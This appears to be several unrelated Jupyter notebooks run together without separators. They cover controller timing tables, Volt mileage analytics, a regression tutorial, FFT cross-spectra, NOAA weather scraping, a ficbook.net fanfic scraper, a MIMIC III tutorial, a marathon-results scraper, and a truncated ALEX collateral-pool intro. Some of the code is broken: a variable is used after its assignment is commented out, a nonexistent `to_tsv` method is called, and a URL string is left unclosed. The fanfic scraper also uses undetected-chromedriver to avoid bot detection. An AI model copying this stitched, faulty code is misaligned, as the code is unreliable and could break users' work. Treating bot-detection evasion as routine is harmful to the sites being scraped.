common_plots.frame_3d(controllers["qp"]["T_dist2_res"],T_des=T_des) #ax.set_title("QP($e_Q$)") ax.set_xlim([-0.5, 1.]) ax.set_ylim([-0.5, 1.]) ax.set_zlim([0., 1]) ax.set_zlabel("z [m]") #nice_plotting.format_axes(ax) plt.savefig("e_T_traj.pdf",bbox_inches="tight", pad_inches=0.25) ax = common_plots.frame_3d(controllers["pinv"]["Q_dist2_res"],T_des=T_des) ax.set_title("PINV(Q\_dist2)") ax = common_plots.frame_3d(controllers["pinv"]["T_dist2_res"],T_des=T_des) ax.set_title("PINV(T\_dist2)") def ms_format(t): return "{:.2f} ms".format(1000.0*t) for cnstr_key in cnstr_situations.keys(): print("Constraint: "+str(cnstr_key)) for cntrl_key in controllers.keys(): print("\tController: "+str(cntrl_key)) print("\t\tInitial: "+ms_format(controllers[cntrl_key][cnstr_key+"_res"]["t_run_sim"][0])) print("\t\tAverage: "+ms_format(cs.np.mean(controllers[cntrl_key][cnstr_key+"_res"]["t_run_sim"]))) def ms_format(t): return"{:.2f} ms".format(1000.0*t) cntrllrs_tab = ["pinv","qp","nlp","mpc"] tab_str = "& PINV & QP & NLPC & MPC\\\\ \n\midrule\n" tab_str += "Initial ($\\bm{e}_Q$)" for cntrl_key in cntrllrs_tab: tab_str += "& "+ms_format(controllers[cntrl_key]["Q_dist2_res"]["t_run_sim"][0]) tab_str += "\\\\\n" tab_str += "Average ($\\bm{e}_Q$)" for cntrl_key in cntrllrs_tab: tab_str += "& "+ms_format(cs.np.mean(controllers[cntrl_key]["Q_dist2_res"]["t_run_sim"])) tab_str += "\\\\\n" tab_str += "Initial ($\\bm{e}_T$)" for cntrl_key in cntrllrs_tab: tab_str += "& "+ms_format(controllers[cntrl_key]["T_dist2_res"]["t_run_sim"][0]) tab_str += "\\\\\n" tab_str += "Average ($\\bm{e}_T$)" for cntrl_key in cntrllrs_tab: tab_str += "& "+ms_format(cs.np.mean(controllers[cntrl_key]["T_dist2_res"]["t_run_sim"])) print(tab_str)& PINV & QP & NLPC & MPC\\ \midrule Initial ($\bm{e}_Q$)& 0.07 ms& 0.68 ms& 3.58 ms& 21.13 ms\\ Average ($\bm{e}_Q$)& 0.05 ms& 0.24 ms& 2.93 ms& 17.94 ms\\ Initial ($\bm{e}_T$)& 0.06 ms& 0.60 ms& 4.15 ms& 17.45 ms\\ Average ($\bm{e}_T$)& 0.04 ms& 0.25 ms& 2.94 ms& 159.76 msVolt Analytics Import Dependenciesimport os import datetime as dt import numpy as np import pandas as pd import pygsheets #authorization gc = pygsheets.authorize(service_file='volt-metrics-creds.json') pd.set_option('display.max_rows', 500) currentDate = dt.datetime.today().date() currentDateRead in CSV files#Volt Daily Data voltDailyData = pd.read_csv('data/voltdailydata_' + currentDate.strftime('%Y%m%d') + '.csv') voltDailyData['Date'] = pd.to_datetime(voltDailyData['Date']) voltDailyData['Date'] = voltDailyData['Date'].dt.date voltDailyData.head() # Calculate total ICE (Internal Combustion Engine) miles driven voltDailyData = voltDailyData.rename(columns = {'MilesDriven':'TotalMilesDriven'}) voltDailyData['TotalICEMiles'] = voltDailyData['TotalMilesDriven'] - voltDailyData['EvMilesDriven'] voltDailyData.head() # Create new DailyMPG Column, round values after adding new column voltDailyData['DailyMPG'] = voltDailyData['TotalMilesDriven'] / voltDailyData['GallonsBurned'] voltDailyData['DailyMPG'] = pd.to_numeric(voltDailyData['DailyMPG'], errors='coerse') voltDailyData = voltDailyData.replace(np.nan, 0) voltDailyData = voltDailyData.round(2) voltDailyData.head() # Add '250+' miles to any DailyMPG value that has a value of infinity # Why 250+? That's the "infinity mileage" that the volt displays in car voltDailyData = voltDailyData.replace(np.inf, 250) voltDailyData.tail() voltDailyData.info() RangeIndex: 333 entries, 0 to 332 Data columns (total 6 columns): Date 333 non-null object TotalMilesDriven 333 non-null float64 EvMilesDriven 333 non-null float64 GallonsBurned 333 non-null float64 TotalICEMiles 333 non-null float64 DailyMPG 333 non-null float64 dtypes: float64(5), object(1) memory usage: 15.7+ KBVolt Readings#Volt Readings throughout the day (usually two), convert Timestamp to datetime object voltReadings = pd.read_csv('data/voltdata_' + currentDate.strftime('%Y%m%d') + '.csv') voltReadings.rename(columns = {'LocalTimestamp':'Date', 'GallonsBurned': 'LifeTimeGalBurned'}, inplace=True) voltReadings['Date'] = pd.to_datetime(voltReadings['Date']) voltReadings.head() # Select only columns desired voltReadings = voltReadings[['Date', 'LifeTimeGalBurned', 'LifetimeFuelEcon', 'LifetimeEvMiles','LifetimeMiles']] # Calculate LifetimeICEMiles voltReadings['LifetimeICEMiles'] = voltReadings['LifetimeMiles'] - voltReadings['LifetimeEvMiles'] # Sort based on timestamp, reorder columns, round values voltReadings.sort_values(by='Date', inplace=True) voltReadings = voltReadings[['Date', 'LifeTimeGalBurned','LifetimeFuelEcon','LifetimeEvMiles','LifetimeICEMiles','LifetimeMiles']] voltReadings = voltReadings.round(2) voltReadings['Date'] = voltReadings.Date.dt.normalize() voltReadings.head() # Drop dupes based on date column voltReadings.drop_duplicates(subset='Date', keep='last', inplace=True) voltReadings.head() # Combine dataframes based on date indexes voltStats = pd.concat([voltReadings.set_index('Date'),voltDailyData.set_index('Date')], join='inner', axis=1) voltStats.tail() #Remove rows that show 0 for TotalMilesDriven, EvMilesDriven, GallonsBurned, TotalICEMiles, DailyMPG (Days not driven) voltStats = voltStats[voltStats.DailyMPG != 0] voltStats.tail() # Check info on columns voltStats['Date'] = voltStats.index voltStats.info() # Write voltStats DF to CSV voltStats.to_csv('output/voltstats.csv', encoding='utf-8') #open the google spreadsheet (where 'VoltStats' is the name of my sheet) sh = gc.open('VoltStats') #select the first sheet wks = sh[0] voltStats['Date'] = voltStats['Date'].dt.strftime('%Y-%m-%d') #update the first sheet with df, starting at cell B2. wks.set_dataframe(voltStats,(1,1)) Task-1: To Explore Supervised Machine LearningRegression model that predicts the percentage ofmarks that a student is expected to score based upon thenumber of hours they study.import numpy as np import pandas as pd import matplotlib.pyplot as plt %matplotlib inline data = pd.read_csv('marks_data.csv') data.head() data.info() data.describe() data.shapeRelation between Independent and Target Variableplt.scatter(data['Hours'], data['Scores']) plt.xlabel("Number of Hours") plt.ylabel("Scores") plt.title("Hours vs Scores") plt.show()**Observation:** We can clearly notice that Number of Hours studied is linearly related to the Scores of the student. Data allotment for traning and testingfrom sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(data['Hours'].values.reshape(-1,1), data['Scores'], test_size = 0.2, random_state = 42) X_train.shape, y_train.shape, X_test.shape, y_test.shapeTraining the Modelfrom sklearn.linear_model import LinearRegression model = LinearRegression() model.fit(X_train, y_train)Plotting of graphcoefficient = model.coef_ intercept = model.intercept_ # Since, y = m*x + c line = (data['Hours'].values * coefficient) + intercept plt.scatter(data.Hours, data.Scores) plt.plot(data.Hours, line) plt.show() pred = model.predict(X_test) predComparing predicted and attained valuespred_compare = pd.DataFrame({'Actual Values': y_test, 'Predicted Values':pred}) pred_compareFinal evaluationfrom sklearn import metrics print("Mean Absolute Error: ", metrics.mean_absolute_error(y_test, pred)) print("Mean Squared Error: ", metrics.mean_squared_error(y_test, pred)) print("Root Mean Squared Error: ", metrics.mean_squared_error(y_test, pred)**0.5) print("R2 Score: ", metrics.r2_score(y_test, pred))Mean Absolute Error: 3.9207511902099244 Mean Squared Error: 18.943211722315272 Root Mean Squared Error: 4.352380006653288 R2 Score: 0.9678055545167994**Assuming student studies for 7.5 hours a day**hours = np.asarray(7.5).reshape(-1,1) print(f"{model.predict(hours)[0]} will be predicted score if a student study for 7.5 hrs in a day.") ## Conclusion: Model successfully predicts the expected values using supervised machine learning.Cross Spectral Analysisimport numpy as np import matplotlib.pyplot as plt from scipy.fft import fft, fftfreq, fftshift t = np.linspace(0,50,1000) t.shape[-1] x = np.sin(t) + np.sin(2*t)+ np.sin(4*t)+ np.sin(5*t)+ np.sin(6*t) y = np.sin(3*t)+ np.sin(2*t)+ np.sin(4*t)+ np.sin(7*t)+ np.sin(9*t) plt.plot(x) plt.plot(y)$$F_{x}( k) \ =C_{xk} e^{i\theta _{xk}} \ e^{i\frac{2\pi }{T} kt} =\ \ \frac{1}{2}( A_{xk} -iB_{xk}) e^{i\frac{2\pi }{T} kt}$$Fx = fftshift(fft(x)) Fy = fftshift(fft(y)) Ffreq = fftshift(fftfreq(t.shape[-1])) plt.plot(Ffreq, Fx.real, Ffreq, Fy.real)$$co-spectra\ =\ A_{xk} A_{yk} +B_{xk} B_{yk}$$Cxy = Fx.real*Fy.real + Fx.imag*Fy.imag plt.plot(Cxy)$$quad-spectra\ =\ A_{xk} B_{yk} -A_{yk} B_{xk}$$Qxy = Fx.real*Fy.imag - Fx.imag*Fy.real plt.plot(Qxy) enumerate(Cxy) cross = [np.complex(i, j) for index, [i,j] in zip(enumerate(Cxy),enumerate(Qxy))] plt.plot(cross)C:\Users\starlord\anaconda3\lib\site-packages\numpy\core\_asarray.py:83: ComplexWarning: Casting complex values to real discards the imaginary part return array(a, dtype, copy=False, order=order)PJM 180 gigawattsMore than 1,000 companies are members of PJM, which serves 65 million customers and has 180 gigawatts of generating capacity. With 1,376 generation sources, 84,236 miles (135,560 km) of transmission lines and 6,038 transmission substations, PJM delivered 807 terawatt-hours of electricity in 2018.#https://learn.pjm.com/who-is-pjm/where-we-operate.aspx import matplotlib.pyplot as plt img_path = 'PJM.png' img_p = plt.imread(img_path) plt.figure(figsize=(20,10)) plt.imshow(img_p)**Get 100 stations for state and eventually send each id to the python script below to get the weather reported for each id**Get a Subset of StationsThere are certain filters that can be applied. You can limit stations to a certain geographical location using a FIPS (Federal Information Processing System) code. I don't know if there's a central source for these codes, but here are some.Since it's an excel sheet and not everyone can open it, here's a portion of it reproduced:01 - Alabama|02 - Alaska|04 - Arizona|05 - Arkansas|06 - California|08 - Colorado|09 - Connecticut|**10 - Delaware|****11 - District of Columbia|**12 - Florida|13 - Georgia|15 - Hawaii|16 - Idaho|**! 17 - Illinois|**18 - Indiana|19 - Iowa|20 - Kansas|**! 21 - Kentucky|**22 - Louisiana|23 - Maine|**24 - Maryland|**25 - Massachusetts|**! 26 - Michigan|**27 - Minnesota|28 - Mississippi|29 - Missouri|30 - Montana|31 - Nebraska|32 - Nevada|33 - New Hampshire|**34 - New Jersey|**35 - New Mexico|36 - New York|**! 37 - North Carolina|**38 - North Dakota|**39 - Ohio|**40 - Oklahoma|41 - Oregon|**42 - Pennsylvania|**44 - Rhode Island|45 - South Carolina|46 - South Dakota|47 - Tennessee|48 - Texas|49 - Utah|50 - Vermont|**51 - Virginia|**53 - Washington|**54 - West Virginia|**55 - Wisconsin|56 - Wyoming|token= {'token':""} import requests import json import pandas as pd FIPS = [34,42,39,10,11,24,51,54] FIPS2 = [17,21,26,37] state = ['New Jersey','Pennsylvania','Ohio', 'Delaware','District of Columbia', 'Maryland','Virginia','West Virginia'] df_fips = pd.DataFrame() for index, location in enumerate(FIPS): url = f'https://www.ncdc.noaa.gov/cdo-web/api/v2/stations?locationid=FIPS:{location}&limit=100&sortfield=mindate' r = requests.get(url, headers=token) print(location,r) response = r.json() df = pd.DataFrame.from_dict(response['results']) df['state'] = state[index] df_fips = pd.concat([df_fips,df]) df_fips[['location_type','location']] = df_fips['id'].apply(lambda x: pd.Series(str(x).split(":")))* The National Weather Service Cooperative Observer Program (COOP)* Global Historical Climatology Network Daily (GHCND)* Next-Generation Radar (NEXRAD) is a network of 159 high-resolution S-band Doppler weather radars operated by the National Weather Service* Weather Bureau Army Navy (WBAN)df_fips.groupby('location_type').count() df_fips.to_csv('station_details_addition.csv',sep='|',index=False) GHCND = df_fips[df_fips['location_type']=='GHCND'] GHCDN_list = sorted(GHCND['location'].tolist(),reverse=True) len(GHCDN_list) import json with open('config.json') as conf_file: config = json.load(conf_file) config['params']['weather_stations'] = GHCDN_list with open('config_new.json', 'w') as json_file: json.dump(config, json_file,indent=1) limit = 1000 base_url = f"https://www.ncdc.noaa.gov/cdo-web/api/v2/data?datasetid=GHCND&limit={limit}&stationid=GHCND:" weather_stations = GHCDN_list weather_features = ["station_dt_key","date","station","PRCP","SNOW","SNWD","AWND","TMAX","TMIN"] start_date = "-01-01" end_date = "-12-31" import time import requests import pandas as pd import json not_found = [] def get_url(url,token,station,year): r = requests.get(url, headers=token) print(r) try: response = r.json() except: print(f'Error {station}') station_not_found = {'url':url,'station':station,'year':year,'error':r} not_found.append(station_not_found) return None if bool(response): count = response['metadata']['resultset']['count'] print(count) return count else: print(f'No Records Found for {station}') station_not_found = {'url':url,'station':station,'year':year} not_found.append(station_not_found) return None def fetch_weather_data(base_url, weather_stations,start_date, end_date, token): years = ['2020'] df_stations = pd.DataFrame() for year in years: for index, station in enumerate(weather_stations): offset = 0 print(f'{index}: ',station, year) # url = f'{base_url}{station}&units=standard&startdate={year}{start_date}&enddate={year}{end_date}&includemetadata=True' #url = (base_url + station + '&startdate=' + start_date + '&enddate=' # + end_date + f'&units=standard&limit=50&offset={offset}&%includemetadata=True') count = get_url(url,token,station,year) if bool(count): while offset <= count: loop_url = f'{base_url}{station}&offset={offset}&units=standard&startdate={year}{start_date}&enddate={year}{end_date}' print(loop_url) r = requests.get(loop_url, headers=token) #print(r) try: response = r.json() interval_data = reformat_data(r.text) df_stations = pd.concat([df_stations,interval_data]) offset = offset + limit print('-- done.') except: continue #sleep for 10 seconds to avoid going over rate limit. time.sleep(10) return df_stations def reformat_data(json_text): """ Convert data to denormalized pandas dataframe. This format will allow easier analysis and better fit within a typical data warehouse schema. """ #convert records from nested json to flat pandas dataframe. api_records = json.loads(json_text)['results'] df = pd.pivot_table(pd.DataFrame(api_records), index=['date', 'station'], columns='datatype', values='value') reshaped_df = df.rename_axis(None, axis=1).reset_index() #clean up the date and station fields #reshaped_df.date = reshaped_df.date.str.slice(0, 10) #reshaped_df.station = reshaped_df.station.str.slice(6, 17) #add a primary key for useful for updating/inserting records in a database. reshaped_df['station_dt_key']=reshaped_df['station'].astype(str)+'_'+reshaped_df['date'].str.slice(0, 10) #filter for requested features, replace NAs with 0. final_df = reshaped_df.filter(items=weather_features) final_df.fillna(0.0) return final_df df_stations = fetch_weather_data(base_url,weather_stations,start_date,end_date,token)0: USW00093725 2020 No Records Found for USW00093725 1: USW00014773 2020 No Records Found for USW00014773 2: USW00014767 2020 No Records Found for USW00014767 3: USW00014734 2020 2541 https://www.ncdc.noaa.gov/cdo-web/api/v2/data?datasetid=GHCND&limit=1000&stationid=GHCND:USW00014734&offset=0&units=standard&startdate=2020-01-01&enddate=2020-12-31 -- done. https://www.ncdc.noaa.gov/cdo-web/api/v2/data?datasetid=GHCND&limit=1000&stationid=GHCND:USW00014734&offset=1000&units=standard&startdate=2020-01-01&enddate=2020-12-31 -- done. https://www.ncdc.noaa.gov/cdo-web/api/v2/data?datasetid=GHCND&limit=1000&stationid=GHCND:USW00014734&offset=2000&units=standard&startdate=2020-01-01&enddate=2020-12-31 -- done. 4: USW00013781 2020 2534 https://www.ncdc.noaa.gov/cdo-web/api/v2/data?datasetid=GHCND&limit=1000&stationid=GHCND:USW00013781&offset=0&units=standard&startdate=2020-01-01&enddate=2020-12-31 -- done.[...]**Output for above**export_not_found = pd.DataFrame(not_found) export_not_found.to_csv('2020_kickout_new.csv',sep='|',index=False) export_not_found import matplotlib as plot import seaborn as sns df_stations df_stations.to_csv('Raw_2020_NOAA_new.csv',sep='|',index=False) clean_df_stations = df_stations.drop_duplicates('station_dt_key').fillna(0) clean_df_stations['date'] = clean_df_stations['date'].apply(lambda x: x[:10]) clean_df_stations['month'] = clean_df_stations['date'].apply(lambda x: x[5:7]) clean_df_stations['TDIFF'] = clean_df_stations['TMAX'] - clean_df_stations['TMIN'] f, axes = plt.subplots(2, 4, figsize=(20, 10)) visual_data = clean_df_stations sns.lineplot(x='date',y='PRCP',data=visual_data,hue='month',ax=axes[0,0],palette='colorblind') sns.lineplot(x='date',y='AWND',data=visual_data,hue='month',ax=axes[1,0],palette='colorblind') sns.lineplot(x='date',y='SNOW',data=visual_data,hue='month',ax=axes[0,1],palette='colorblind') sns.lineplot(x='date',y='SNWD',data=visual_data,hue='month',ax=axes[1,1],palette='colorblind') sns.lineplot(x='date',y='TMAX',data=visual_data,hue='month',ax=axes[0,2],palette='colorblind') sns.lineplot(x='date',y='TMIN',data=visual_data,hue='month',ax=axes[1,2],palette='colorblind') sns.lineplot(x='date',y='TDIFF',data=visual_data,hue='month',ax=axes[0,3],palette='colorblind') sns.countplot(x='month',data=visual_data,ax=axes[1,3],palette='colorblind')PRCP = Precipitation (mm or inches as per user preference, inches to hundredths on Daily Form pdf file)SNOW = Snowfall (mm or inches as per user preference, inches to tenths on Daily Form pdf file)SNWD = Snow depth (mm or inches as per user preference, inches on Daily Form pdf file)TMAX = Maximum temperature (Fahrenheit or Celsius as per user preference, Fahrenheit to tenths onDaily Form pdf fileTMIN = Minimum temperature (Fahrenheit or Celsius as per user preference, Fahrenheit to tenths onDaily Form pdf filedf_complete = clean_df_stations.merge(df_fips,left_on='station',right_on='id',how='left') df_complete df_complete.to_csv('2016_NOAA_addition.csv',sep='|',index=False) !pip install plotly import plotly.express as px fig = px.scatter_mapbox(df_complete, lat="latitude", lon="longitude", hover_name="station", color_discrete_sequence=["fuchsia"], zoom=3, height=700) fig.update_layout(mapbox_style="open-street-map") fig.show()FFNet metadata scraperThis notebook scrapes metadata from the Russian fanfic site [Ficbook.net](https://ficbook.net/). To make it work, put the URL for a particular fandom page (everything up to `&p=`) in as the *ScraperStem* value below, and set the range to be (1,some-number), where some-number is the final page of the paginated results for that fandom.#Install selenium for Python-based browser control import sys !{sys.executable} -m pip install selenium #Install undetected-chromedriver so you won't be identified as a bot import sys !{sys.executable} -m pip install undetected-chromedriver #You may need to run something on the Apple Terminal to make chromedriver work #xattr -d com.apple.quarantine /usr/local/bin/chromedriver #is what worked for me #Import libraries import undetected_chromedriver as uc from selenium import webdriver from selenium.webdriver.common.keys import Keys import pandas as pd from random import randint import time from time import sleep from bs4 import BeautifulSoup from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By import re #Defines list of icon ID values that don't have useful info pointlessicons = ['badge-with-icon', 'badge-secondary'] #Creates Pandas dataframe with the metadata russianfanfic = pd.DataFrame(columns=["Title", "Storylink", "AuthName", "AuthID", "Shiptype", "Rating", "Status", "Likes", "Paid", "Fandom", "Charships", "Length", "Postdate", "Tags", "Blurb"]) #Launches the Undetected Selenium driver driver = uc.Chrome()Set the ScraperStem to the first part of the page for the fandom you're interested in, below, along with the page range.#Base URL for a fandom, up to `?p=` which defines which page ScraperStem = "https://ficbook.net/fanfiction/books/harri_potter?p= #Set the range here, between 1 and the highest-number page for the fandom for i in range(1,53): #Define the full URL as the base URL + the page number ScraperURL = ScraperStem + str(i) #Print the full URL print(ScraperURL) #Load the full URL driver.get(ScraperURL); #Wait 6 seconds time.sleep(6) #Find all the spoiler / hidden tags spoilers = driver.find_elements_by_class_name('show-hidden-tags-btn') #For every spoiler / hidden tag, click the tag to show its value for x in range(0,len(spoilers)): if spoilers[x].is_displayed(): spoilers[x].click() sleep(randint(1,3)) #Get the page source pageSource = driver.page_source #Parse the page source with Beautiful Soup soup = BeautifulSoup(pageSource) #Find the container for the fics fics = soup.find_all("div", {'class': 'js-toggle-description'}) #For each fic for fic in fics: #Find the title container title = fic.find('h3', {'class': 'fanfic-inline-title'}) #Find the story link storylink = title.a['href'] #Find the text of the title title = title.text #Find the container with the ship type shiptype = fic.find('div', {'class': 'direction'}) #Find the span with the ship type badge shiptype = shiptype.find('span', {'class': 'badge-text'}) #Get the text from the ship type shiptype = shiptype.text #Get all the containers with icons icons = fic.find_all("span", {'class': 'badge-with-icon'}) #For each icon for icon in icons: #Get the class of the icon as the iconvalue iconvalues = icon["class"] #For each iconvalue for iconvalue in iconvalues: #If the iconvalue isn't in the pointlessicons list if iconvalue not in pointlessicons: #If the iconvalue includes 'badge-status' if 'badge-status' in iconvalue: #The iconvalue is the text status textstatus = iconvalue #Find a span tag with an icon rating = fic.find("strong", {'class': 'badge-with-icon'}) if rating not in pointlessicons: #Get the badge text as the rating rating = rating.find('span', {'class': 'badge-text'}).text #Find a span with the class badge-likes likes = fic.find("span", {"class": 'badge-like'}) if likes is not None: #If it's not empty, that's the number of likes likenumber = likes.find('span', {"class": 'badge-text'}).text else: #Otherwise assign it to empty likenumber = '' #Find a span with the class badge-translate translationicon = fic.find('span', {'class': 'badge-translate'}) #If it's not empty, then it's translated if translationicon is not None: translation = 'translated' else: #Otherwise set translation to empty translation = '' #Find a span with the class badge-reward award = fic.find("span", {"class": 'badge-reward'}) #If it's not empty, that's the award if award is not None: awardnumber = award.find('span', {"class": 'badge-text'}).text else: #Otherwise set award to empty award = '' #Find a div with the class hot-fanfic paid = fic.find("div", {"class": 'hot-fanfic'}) #If it's not empty, set it to be 'paid' if paid is not None: paid = 'paid' else: paid = '' #Find a span with the class author author = fic.find('span', {'class': 'author'}) #Author profile link is the link here authlink = author.a['href'] #Author name is the text on this link authname = author.text #Find the table with metadata tables = fic.find_all('dd') #The fandom is the second value in the table fandom = tables[1].text #If there's 5 things in the table: if len(tables) == 4: #Set character ships to empty charships = '' #Length is the third value in the table length = tables[2].text #Post date is the 4th value in teh table postdate = tables[3].text #If there's 6 things in the table if len(tables) == 5: #Character ships are the third thing charships = tables[2].text #Length is the 4th thing length = tables[3].text #Post date is the 5th thing postdate = tables[4].text #Find a div with the class tags tagbox = fic.find("div", {"class": 'tags'}) #If there are tags if tagbox is not None: #Find all links taglist = tagbox.find_all('a') #Make an empty list for tags tags = [] #For each tag in the tag list for tag in taglist: #The tag is the text of the link in the tag box tag = tag.text #Add that tag to the list of tags tags.append(tag) #Combine all the things in the tag list, separated by pipes alltags = '|'.join(tags) #Blurb is the div with fanfic-description-text blurb = fic.find('div', {'class': 'fanfic-description-text'}).text #Create a new item with the metadata that's been scraped newitem = {"Title": title, "Storylink": storylink, "AuthName": authname, "AuthID": authlink, "Shiptype": shiptype, "Rating": rating, "Status": textstatus, "Likes": likenumber, "Paid": paid, "Fandom": fandom, "Charships": charships, "Award": award, "Translation": translation, "Length": length, "Postdate": postdate, "Tags": alltags, "Blurb": blurb} #Add the item to the Pandas dataframe russianfanfic = russianfanfic.append(newitem, ignore_index=True) #Wait 3-10 seconds before loading the new page sleep(randint(3,10)) #Display the results russianfanfic #Remove newlines and tabs cleanrussianfanfic = russianfanfic.replace(to_replace=[r"\\t|\\n|\\r", "\t|\n|\r"], value=[" "," "], regex=True, inplace=False) cleanrussianfanfic cleanrussianfanfic.to_tsv('/Users/qad/Documents/russianfanfic-2020-04.tsv', index=False, sep="\t")A Quick Look at the MIMIC III Data Setimport warnings warnings.simplefilter("ignore") from cdsutils.mutils import * from cdsutils.pg import * #from dminteract.modules.m5 import * import numpy as np import numpy.random as ra import ipywidgets as ipw from getpass import getpassMIMIC III data are stored in a relational database. This is not an exploration of relational database theory or data modeling, but here is my novice quick description.* Relational databases seek to achieve accurate data representation by eliminating (reducing) data redundancies and thus the opportunities for data inconsistencies.This is achieved by splitting data across **tables** and then **joining** the data back together when required. First we need to generate a connection to the MIMIC databaseAs you work through this notebook, you might occasionally get an error that looks something like this (although much longer):```PythonOperationalError: (psycopg2.OperationalError) server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request.```This just means that the connection with the database has timed out. All you need to do is come back up here and rerun the code below to get a new database connection.conn = ibis.postgres.connect( user=input("under your University of Melbourne username"), password=getpass("enter your password provided by Brian (not your physionet password and not your University of Melbourne password)"), host='agsfczqlcan.db.cloud.edu.au', port=5432, database='mimic') schema= "mimiciii" # ibis.options.interactive = TrueLet's take a look at the tables>Before you can do anything, you have to understand tables. If you don't have a table, you have nothing to work on. The table is the standard unit of information in a relational database. Everything revolves around tables. Tables are composed of rows and columns. And while that sounds simple, the sad truth is that tables are not simple. (*The Definitive Guide to SQLite*, p. 80 [owens2006definitive})Since I said data are split across tables, let's look at the tables in the MIMIC II demo database. Take a look at the Tables in the DatabaseHTML(dlist(conn.list_tables(schema=schema), ncols=7, sort=True))`chartevents` is where the vast majority of data in MIMIC III is contained. Consequently, PostgreSql implements this table using a [partioned design](https://www.postgresql.org/docs/12/ddl-partitioning.html). This clutters are view somewhat, so let's use some python to clean up our view by excluding the pieces `chartevents` is split into.ta = conn.table("admissions", schema=schema) ta.admission_type.distinct().execute() HTML(dlist([t for t in conn.list_tables(schema=schema) if "chartevents_" not in t], ncols=6, sort=True))MIMIC III is well documented- You can read about each table [here](https://mimic.physionet.org/mimictables/).- As an example we can look at [microbiologyevents](https://mimic.physionet.org/mimictables/microbiologyevents/) What are in the tables? Ibis Provides two ways to see the definitions of each table1. `info()`1. `schema()1 `info`t = conn.table("icustays", schema=schema) t.info()This is fairly ugly output, but tells us quite a bit about the table- `Column`: This is the column name- `Type`: This provides two pieces of information - The data type used to represent the data (e.g. `int32` (a 32 bit integer) - Whether the value is `nullable` (can be missing) - Example: `row_id` is represented with a 32 bit integer and CANNOT be missing - Example: `outtime` is represented with a `TimeStamp` and CAN be missing- `Non-NULL `: The number of rows in the table with non-NULL values for that column `schema()``schema()` returns a dictionary-like object that provides the column names and the data tuype for the column, but does not provide any information about whether the value can be missing or not.view_dict(t.schema()) view_table("diagnoses_icd", conn)Take a look at [`patients`](https://mimic.physionet.org/mimictables/patients/)view_table("patients", conn)The [documentation](https://mimic.physionet.org/mimictables/patients/) tell us that this table links to `admission` and `icustays` vis the `subject_id` value.There are three different date of death columns. You can read about the differences and decide which value you would want to use.- `NaT` represents a __missing time__.- `gender`: `GENDER is the genotypical sex of the patient`According to the WHO>Humans are born with 46 chromosomes in 23 pairs. The X and Y chromosomes determine a person’s sex. Most women are 46XX and most men are 46XY. Research suggests, however, that in a few births per thousand some individuals will be born with a single sex chromosome (45X or 45Y) (sex monosomies) and some with three or more sex chromosomes (47XXX, 47XYY or 47XXY, etc.) (sex polysomies). In addition, some males are born 46XX due to the translocation of a tiny section of the sex determining region of the Y chromosome. Similarly some females are also born 46XY due to mutations in the Y chromosome. Clearly, there are not only females who are XX and males who are XY, but rather, there is a range of chromosome complements, hormone balances, and phenotypic variations that determine sex. (["Gender and Genetics"](https://www.who.int/genomics/gender/en/index1.html:~:text=The%20X%20and%20Y%20chromosomes,47XYY%20or%2047XXY%2C%20etc.)))So how many different genders are in the database?We can use the `dictinct` method to get the unique values in a column:t_pat = conn.table("patients", schema=schema) t_pat['gender'].distinct().execute(limit=None) t_pat.filter([t_pat.gender=='M']).count().execute(limit=None)How many total patients are there?- `count()` counts the number of rows in the table- A Note about execute:t_pat.count().execute(limit=None)Look at [`admissions`](https://mimic.physionet.org/mimictables/admissions/)view_table("admissions", conn)In addition to the admission, and discharge information, this table also contains demographic information. Examine [`prescriptions`](https://mimic.physionet.org/mimictables/prescriptions/)For a patient being given medication (medication event), we would want to know things like who was the medicine given to, who gave it to them, what was the medicine, when was it given, etc.Examining the `prescription` table we an see the nature of a relational databaset_pre = conn.table("prescriptions", schema=schema) t_pre.info() display(view_dict(conn.table("prescriptions", schema=schema).schema())) view_table("prescriptions", conn)Importing Librariesimport numpy as np import pandas as pd import requests from bs4 import BeautifulSoupParametersurl_base = 'https://secure.tiktok.biz/results/list/sydneyhalfmarathon/2015/21KM' n_max = 200 data_body = {'__EVENTTARGET': 'ctl00$pagePlaceHolder$btnNextT', '__VIEWSTATE': ''}Scraping# First request performed by a HTTP GET call r = requests.get(url_base) # Check if the website is available status_ok = True if (r.status_code == 200): print('First request succeeded') status_ok = True else: print('First request failed') status_ok = False # Parsing of useful data soup = BeautifulSoup(r.content, 'html.parser') state = soup.find(id="__VIEWSTATE")['value'] data_body['__VIEWSTATE'] = state # Here we get the first table of the HTML page table = soup.find('table') print(table.find_all('td')[0]) # to remove, just for the example i = 1; while(status_ok): # Perform a new request by a HTTP POST call r = requests.post(url_base, data = data_body) if (r.status_code == 200): # Parsing of useful data soup = BeautifulSoup(r.content, 'html.parser') state = soup.find(id="__VIEWSTATE")['value'] button = soup.find(id='ctl00_pagePlaceHolder_btnNextT') has_no_next = button.has_attr('disabled') data_body['__VIEWSTATE'] = state # Here we get the first table of the HTML page table = soup.find('table') print(table.find_all('td')[0]) # to remove, just for the example else: print('A request fails') status_ok = False if (i >= n_max): status_ok = False if (has_no_next): status_ok = False i += 11. Introduction Collateral Reblance Pool (CRP) dynamically rebalances Collateral to ensure the ayToken minted (i.e. the loan) remains solvent, especially in an adverse market environment (i.e. the value of the loan does not exceed the value of Collateral). This dynamic rebalancing, together with a careful choice of the key parameters (including loan to Loan-to-Value (LTV) and volatility assumption) allows ALEX to eliminate the liquidation needs. Any residual gap risk (which CRP cannot address entirely) is addressed through maintaining a strong reserve fund. When a Borrower mints ayToken by providing appropriate Collateral, the Collateral is converted into a basket of Collateral and Token, with the weights determined by CRP.In this notebook, we will help you understand the key attributes of the CRP pool by answering: 1. How does CRP achieve the dynamic rebalances with weights determined by CRP? 2. How does CRP perform in different market environments? 3. How does power arbitrageur play a role in the dynamic rebalances and the bring rebate back to the pool. 3. In which parameters space (including LTV, volatility assumption, and power arbitrageur functions) and the CRP would maintain a low default risk and a high pool-value level to a collateral ratio (PVCR)? Given there is no close form of CPR performance, we use simulation to show the results based on the predicted future scenarios. 2. CRP dynamic rebalance mechanism The following diagram illustrates how CRP dynamic rebalances with the weights determined by CRP. Once the pool updates new weights based on the Black-Scholes option-pricing model, the pool will be rebalanced by Power Arbitrageur to bring the spot price back to the market price. We leave the mathematical formula of the weight to session 5. ![CRP%20diagram.png](attachment:CRP%20diagram.png) 3. CRP performance by Simulations In this session, we want to simulate how CRP performs in different market environments. Basically, a CRP would serve as an agent (bot) response to the actual market environment by updating the pool weight based on current token price $p$, actual 